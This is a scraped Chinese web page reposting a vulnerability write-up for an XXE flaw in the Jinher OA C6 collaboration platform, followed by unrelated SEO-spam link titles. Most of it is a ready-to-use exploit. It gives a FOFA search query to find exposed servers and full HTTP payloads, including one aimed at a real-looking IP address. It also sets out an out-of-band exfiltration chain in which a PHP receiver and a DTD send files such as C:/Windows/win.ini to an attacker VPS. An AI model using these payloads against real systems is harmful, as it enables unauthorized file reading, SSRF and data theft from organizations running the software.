当前位置: 首页 > news >正文

欧美 电台 网站模板宠物网站建设论文

欧美 电台 网站模板,宠物网站建设论文,响应式网站开发的理解,怎么在百度做网站推广0x01 产品描述: 金和C6协同管理平台是以"精确管理思想"为灵魂,围绕“企业协同四层次理论”模型,并紧紧抓住现代企业管理的六个核心要素:文化 Culture、 沟通Communication 、 协作Collaboration 、创新 Creation、 控制…

0x01 产品描述:

        金和C6协同管理平台是以"精确管理思想"为灵魂,围绕“企业协同四层次理论”模型,并紧紧抓住现代企业管理的六个核心要素:文化 Culture、 沟通Communication 、 协作Collaboration 、创新 Creation、 控制 Control、中心 Center,而构建了结构化的、灵活集成的、动态响应的、面向企业运营管理的智慧协同应用管理平台。
0x02 漏洞描述:

        金和OA-C6 ApproveRemindSetExec.aspx接口存在XXE漏洞,未经授权的攻击者可利用该漏洞实现任意文件读取或ssrf。
0x03 搜索语句:

Fofa:body="c6/Jhsoft.Web.login"


0x04 漏洞复现:

利用dnslog复现

POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://123.0olbin.dnslog.cn"> %remote;]>

 

服务器快速检测: 

POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1
Host: 61.133.99.56:88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://your-vps:port/test.xml"> %remote;]>

利用dtd获取数据:

整体流程:poc利用个人服务器执行dtd与读取目标服务器的c盘文件内容。

Dtd内容是XXE无回显利用方式,将内容外带到其他地方,将内容通过get.php写入file.txt。

首先在vps上创建以下脚本:

<?php
$data=$_GET['file'];
$myfile = fopen("file.txt", "w+");
fwrite($myfile, $data);
fclose($myfile);
?>

 构造dtd用以读取,dtd里内容如下

<!ENTITY % all "<!ENTITY send SYSTEM 'http://your-vps:port/get.php?file=%file;'>">

构造完成后vps启动服务用于信息监听

请求构造以下数据

POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///C:/Windows/win.ini">
<!ENTITY % remote SYSTEM "http://your-vps:port/xxe.dtd">
%remote;
%all;
]>
<root>&send;</root>

 

 获取win.ini数据

解码后

0x05 修复建议:

官方已修复该漏洞,请用户联系厂商修复漏洞:http://www.jinher.com/

http://www.yayakq.cn/news/208799/

相关文章:

  • 网站个人空间怎么做影视制作
  • oa网站开发哪里找专业做网站的公司
  • 新乡网站建设加盟电话wordpress 自动收录
  • 网站建设与管理报告重庆网络教育学院官网
  • php网站设计要学多久佛山网站建设计
  • 高新区免费网站建设wordpress农业模板
  • 做自适应网站注意事项大地资源免费视频观看
  • 网站建设的系统简介wordpress国内主题排行
  • 国家网站icp备案查询建设网站要求
  • 长沙公司网站费用专业做网站系统
  • 做移动网站优app设计方案模板
  • 安顺网站建设做书照片网站
  • 一起做陶瓷官方网站wordpress 定制缩略图
  • wordpress如何仿站代做道路毕业设计网站
  • 数据库电影网站源码seo推广营销公司
  • 网站模板用什么软件做在线教育网站策划方案
  • 用什么软件做网站最简单 最方便主流网站开发平台
  • 做网站遇到各种问题公司部门解散赔偿标准
  • 搜索引擎营销的过程集美seo
  • 做网站 你的出路在哪里瑞安网站建设优化
  • 济源新站seo关键词排名推广长沙app网站开发
  • 公司网站 设计方案中文门户网站有哪些
  • 网站建设 $ 金手指排名效果好哪里有给网站做360
  • 本地网站建设需要什么网站底部的备案信息
  • 遵义市住房和城乡建设厅网站济南市住建厅官方网站
  • 大足集团网站建设怎么开通微信小程序商店
  • 上海网站建设海淘科技mega Wordpress
  • 温州平阳县网站建设兼职电商网站的支付接入该怎么做呢
  • 怎么使用腾讯云做网站网站性能优化的方法有哪些
  • 网络营销是什么营销哈尔滨网站建设优化